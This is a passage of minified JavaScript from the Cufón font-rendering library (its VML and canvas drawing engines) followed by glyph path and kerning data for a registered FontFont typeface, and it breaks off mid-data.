a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 *  Dutch Design: Albert-Jan Pool, 1995. Published by FontShop International
 * FontFont release 15
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"292,-397r-70,0r0,-70r70,0r0,70xm461,-240r-408,0r0,-47r408,0r0,47xm292,-60r-70,0r0,-70r70,0r0,70"},{"d":"180,-49v-1,71,16,79,86,78r0,45v-99,1,-137,-22,-137,-122r0,-207v1,-55,-26,-83,-79,-79r0,-44v53,4,80,-24,79,-79r0,-207v-1,-100,37,-123,137,-122r0,45v-69,-1,-86,7,-86,78r0,207v-1,56,-21,80,-61,100v40,21,60,44,61,100r0,207","w":316},{"d":"416,-482r-224,613v-21,66,-63,90,-148,87r0,-45v119,15,109,-101,146,-173r-176,-482r56,0r145,422r145,-422r56,0xm332,-737r-106,147r-58,0r97,-147r67,0","w":430},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm249,-791v61,0,114,53,114,114v0,61,-53,115,-114,115v-61,0,-114,-54,-114,-115v0,-61,53,-114,114,-114xm249,-604v39,0,73,-34,73,-73v0,-39,-34,-72,-73,-72v-39,0,-73,33,-73,72v0,39,34,73,73,73","w":524},{"w":54},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm311,-590r-58,0r-106,-147r67,0","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"570,-356v0,147,6,198,-51,272r84,84r-36,36r-84,-84v-97,79,-252,70,-335,-19v-71,-77,-66,-126,-66,-289v0,-163,-6,-212,66,-289v91,-98,264,-97,356,0v71,77,66,126,66,289xm482,-121v38,-62,34,-117,34,-235v0,-143,5,-193,-55,-259v-68,-74,-202,-74,-270,0v-60,65,-55,116,-55,259v0,143,-5,193,55,259v63,69,182,74,256,13r-100,-100r36,-36","w":651},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196xm461,-927r-106,147r-58,0r97,-147r67,0","w":687},{"w":487},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202xm413,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"185,-694v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":500},{"d":"573,-488v135,1,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-175,74v-81,0,-139,-30,-172,-90v-39,62,-83,89,-179,90v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61r-37,-32v39,-53,83,-73,170,-74v91,0,148,28,173,85v34,-57,86,-85,156,-85xm715,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94","w":834},{"d":"527,-647v84,87,73,281,61,437v-11,135,-99,210,-239,210r-239,0r0,-712v159,5,333,-22,417,65xm542,-351v0,-207,-31,-307,-206,-313r-172,0r0,616v127,-2,264,17,325,-55v46,-55,53,-144,53,-248","w":678,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"256,-415r-67,0r0,-67r67,0r0,67xm229,191v74,0,129,-60,128,-131r51,0v2,97,-79,176,-179,176v-99,0,-181,-78,-179,-176v3,-91,86,-177,129,-244v18,-29,18,-63,18,-107r51,0v2,59,-3,94,-29,135v-39,62,-113,134,-118,216v-4,72,56,131,128,131","w":488},{"d":"163,68r-68,68r0,-204r68,0r0,136","w":258},{"d":"438,-422r-51,0r-130,-242r-130,242r-51,0r158,-296r46,0"},{"d":"272,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-58,77,-200,84,-269,18r0,269r-51,0r0,-712r51,0r0,299v-1,90,45,144,133,144","w":556},{"d":"514,160r-514,0r0,-38r514,0r0,38"},{"d":"284,-672v-98,-1,-165,53,-165,147v0,180,256,116,347,196v40,35,62,80,62,138v0,127,-104,199,-240,197v-116,-2,-174,-32,-237,-94r38,-38v58,56,100,82,202,84v105,1,183,-49,183,-147v0,-90,-52,-127,-142,-138v-79,-10,-164,-23,-210,-65v-36,-33,-56,-75,-56,-131v0,-164,179,-232,332,-177v31,12,63,32,94,59r-35,35v-48,-41,-88,-66,-173,-66","w":587,"k":{"Y":20,"S":20,"J":20}},{"d":"371,-712v124,-1,215,80,215,205v0,125,-91,205,-215,205r-207,0r0,302r-54,0r0,-712r261,0xm365,-350v101,0,167,-54,167,-157v0,-103,-66,-157,-167,-157r-201,0r0,314r201,0","w":631,"k":{"\u0153":10,"\u00f8":10,"\u00e7":10,"\u00e6":10,"\u00c6":50,"\u00c5":50,"\u00c4":50,"\u00c3":50,"\u00c2":50,"\u00c1":50,"\u00c0":50,"s":10,"q":10,"o":10,"g":10,"e":10,"d":10,"c":10,"a":10,"J":120,"A":50,".":110}},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm459,-790r-58,0r0,-77r58,0r0,77xm251,-790r-58,0r0,-77r58,0r0,77","w":652,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm296,-590r-58,0r-106,-147r67,0","w":524},{"d":"629,0r-54,0r-411,-619r0,619r-54,0r0,-712r54,0r411,617r0,-617r54,0r0,712","w":739},{"d":"398,0r-344,0r0,-48r290,-389r-274,0r0,-45r328,0r0,48r-291,389r291,0r0,45","w":452},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm236,-884v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"291,-488v138,0,180,98,180,247v0,149,-42,247,-180,247v-61,0,-109,-23,-143,-68r0,292r-51,0r0,-712r51,0r0,62v34,-45,82,-68,143,-68xm284,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"560,-546v12,59,12,321,0,380v-28,139,-225,225,-364,137r-35,73r-53,0r49,-102v-77,-76,-75,-129,-75,-298v0,-163,-5,-212,66,-289v75,-80,207,-97,308,-38r35,-73r53,0r-49,102v32,29,57,69,65,108xm506,-183v11,-51,12,-281,2,-337v-5,-32,-17,-61,-37,-84r-253,529v72,52,184,41,243,-22v23,-25,38,-53,45,-86xm434,-637v-72,-52,-185,-41,-243,22v-59,66,-55,116,-55,259v0,134,-5,182,45,248","w":652},{"d":"169,-227r-74,0r0,-74r74,0r0,74","w":264},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm361,-780r-58,0r-106,-147r67,0","w":598},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm418,-927r-106,147r-58,0r97,-147r67,0","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"164,0r-54,0r0,-712r54,0r0,712xm274,-780r-58,0r-106,-147r67,0","w":274},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm434,-790r-58,0r0,-77r58,0r0,77xm226,-790r-58,0r0,-77r58,0r0,77","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"409,-435v49,27,64,52,64,124r0,177v1,101,-76,146,-188,134r0,-45v81,6,137,-16,137,-95r0,-179v2,-79,-55,-98,-137,-91r0,-45v84,9,138,-28,137,-102v-1,-77,-52,-117,-139,-117v-92,0,-135,58,-135,149r0,525r-51,0r0,-525v-1,-119,73,-194,192,-194v105,0,183,55,183,162v0,53,-21,94,-63,122","w":550},{"d":"585,-521v0,108,-68,177,-164,192r172,329r-63,0r-170,-328r-196,0r0,328r-54,0r0,-712r271,0v118,-1,204,72,204,191xm374,-376v93,0,157,-50,157,-144v0,-95,-64,-144,-157,-144r-210,0r0,288r210,0","w":657,"k":{"J":30}},{"d":"970,-263r-404,404r-69,0r379,-379r-819,0r0,-50r819,0r-379,-379r69,0","w":1027},{"d":"321,-642r-70,70r0,-140r70,0r0,70xm165,-642r-70,70r0,-140r70,0r0,70","w":416,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"d":"447,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm447,-37v168,0,315,-151,315,-319v0,-168,-148,-319,-315,-319v-168,0,-315,151,-315,319v0,168,148,319,315,319xm585,-439v-1,62,-40,98,-91,112r101,171r-52,0r-99,-167r-66,0r0,167r-45,0r0,-401r128,0v65,-2,125,53,124,118xm456,-363v46,1,84,-32,84,-76v0,-44,-38,-77,-84,-77r-78,0r0,153r78,0","w":894},{"d":"716,-67r-52,0r0,67r-44,0r0,-67r-170,0r0,-40r154,-320r47,0r-153,320r122,0r0,-120r44,0r0,120r52,0r0,40xm545,-712r-332,712r-45,0r332,-712r45,0xm169,-285r-44,0r0,-378r-80,71r0,-51r80,-69r44,0r0,427","w":756},{"w":195},{"w":195},{"d":"338,-786r-285,860r-53,0r285,-860r53,0","w":338},{"d":"367,-737r-106,147r-58,0r97,-147r67,0","w":500},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm476,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":652,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm443,-927r-106,147r-58,0r97,-147r67,0","w":652,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"599,-488v135,1,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-86,0,-145,-35,-178,-105v-27,61,-88,105,-170,105v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247v82,0,143,44,170,105v33,-70,88,-105,166,-105xm741,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":860},{"d":"484,-712r-210,417r0,295r-54,0r0,-295r-210,-417r58,0r181,360r177,-360r58,0xm364,-927r-106,147r-58,0r97,-147r67,0","w":494},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm184,-694v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":524},{"d":"514,0r-63,0r-186,-317r-186,317r-61,0r218,-365r-204,-347r63,0r170,299r171,-299r62,0r-204,347","w":532,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":15,"Q":10,"O":10,"J":-15,"G":10,"C":10}},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196xm494,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":687},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm261,-884v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":652,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"148,0r-51,0r0,-482r51,0r0,482xm397,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":245},{"d":"461,-240r-408,0r0,-47r408,0r0,47"},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm431,-927r-106,147r-58,0r97,-147r67,0","w":598},{"d":"347,-263v45,-3,50,-15,83,-45r31,31v-44,41,-54,58,-116,62v-23,7,-147,-56,-178,-54v-45,3,-50,15,-83,45r-31,-31v44,-41,54,-58,116,-62v23,-7,147,56,178,54"},{"d":"570,-338r-1,291r372,0r0,47r-425,0r0,-85v-84,115,-270,122,-368,18v-72,-76,-66,-126,-66,-289v0,-163,-6,-212,66,-289v98,-104,284,-97,368,18r0,-85r422,0r0,47r-369,0r1,285r313,0r0,42r-313,0xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141","w":997},{"d":"420,0r-62,0r-127,-203r-129,203r-62,0r163,-246r-156,-236r62,0r122,194r120,-194r62,0r-156,236","w":460,"k":{"\u0153":20,"\u00f8":20,"\u00f6":20,"\u00f5":20,"\u00f4":20,"\u00f3":20,"\u00f2":20,"\u00eb":20,"\u00ea":20,"\u00e9":20,"\u00e8":20,"\u00e7":20,"\u00e6":20,"o":20,"e":20,"c":20}},{"d":"484,-712r-210,417r0,295r-54,0r0,-295r-210,-417r58,0r181,360r177,-360r58,0","w":494,"k":{"\u0153":80,"\u0152":10,"\u00f8":80,"\u00e7":80,"\u00e6":80,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":40,"\u00c5":40,"\u00c4":40,"\u00c3":40,"\u00c2":40,"\u00c1":40,"\u00c0":40,"z":40,"x":40,"u":40,"s":80,"r":40,"q":80,"p":40,"o":80,"n":40,"m":40,"g":80,"e":80,"d":80,"c":80,"a":80,"Q":10,"O":10,"J":40,"G":10,"C":10,"A":40,".":80}},{"d":"164,0r-54,0r0,-712r54,0r0,712xm410,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":274},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94","w":524},{"d":"165,0r-70,70r0,-140r70,0r0,70","w":260},{"d":"321,-642r-70,0r0,-70r70,-70r0,140xm165,-642r-70,0r0,-70r70,-70r0,140","w":416,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"d":"485,-265r-196,196r0,-66r130,-130r-130,-130r0,-66xm278,-265r-196,196r0,-66r130,-130r-130,-130r0,-66","w":527},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"d":"970,-238r-819,0r379,379r-69,0r-404,-404r404,-404r69,0r-379,379r819,0r0,50","w":1027},{"d":"461,-240r-180,0r0,181r-47,0r0,-181r-181,0r0,-47r181,0r0,-180r47,0r0,180r180,0r0,47"},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm393,-737r-106,147r-58,0r97,-147r67,0","w":559},{"d":"102,-806v59,63,85,75,85,173r0,554v-4,97,-26,110,-85,173r-37,-37v51,-54,68,-60,68,-142r0,-542v-3,-82,-17,-88,-68,-142","w":284},{"w":975},{"d":"169,0r-74,0r0,-74r74,0r0,74","w":264},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm464,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":598},{"d":"164,0r-54,0r0,-712r54,0r0,712xm376,-790r-58,0r0,-77r58,0r0,77xm168,-790r-58,0r0,-77r58,0r0,77","w":274},{"d":"72,-655v31,-43,66,-59,136,-60v99,0,148,42,148,126r0,262r-43,0r0,-36v-28,27,-66,41,-114,41v-87,0,-139,-32,-140,-110v-1,-73,56,-111,133,-111r121,0v6,-87,-17,-136,-105,-133v-57,2,-80,13,-104,48xm199,-361v77,0,115,-18,114,-100r0,-47r-116,0v-63,0,-95,25,-95,75v0,55,36,72,97,72","w":447},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202xm380,-737r-106,147r-58,0r97,-147r67,0","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"w":162},{"d":"45,-522v0,-110,91,-190,211,-190r213,0r0,942r-51,0r0,-894r-123,0r0,894r-51,0r0,-562v-113,4,-199,-85,-199,-190","w":579},{"d":"524,-712r-234,712r-46,0r-234,-712r57,0r200,617r200,-617r57,0","w":534,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":35,"\u00c5":35,"\u00c4":35,"\u00c3":35,"\u00c2":35,"\u00c1":35,"\u00c0":35,"z":20,"y":10,"x":20,"u":20,"s":40,"r":20,"q":40,"p":20,"o":40,"n":20,"m":20,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":35,".":80}},{"d":"629,0r-74,0r0,-74r74,0r0,74xm399,0r-74,0r0,-74r74,0r0,74xm169,0r-74,0r0,-74r74,0r0,74","w":724},{"d":"461,-270r-180,0r0,182r-47,0r0,-182r-181,0r0,-47r181,0r0,-181r47,0r0,181r180,0r0,47xm461,0r-408,0r0,-47r408,0r0,47"},{"d":"165,-642r-70,0r0,-70r70,-70r0,140","w":260,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"542,0r-432,0r0,-712r54,0r0,664r378,0r0,48","w":572,"k":{"\u201d":150,"\u201c":150,"\u2019":150,"\u2018":150,"\u0152":40,"\u00d6":40,"\u00d5":40,"\u00d4":40,"\u00d3":40,"\u00d2":40,"\u00c7":40,"y":60,"Y":80,"W":40,"V":70,"U":40,"T":80,"Q":40,"O":40,"J":-15,"G":40,"C":40}},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"d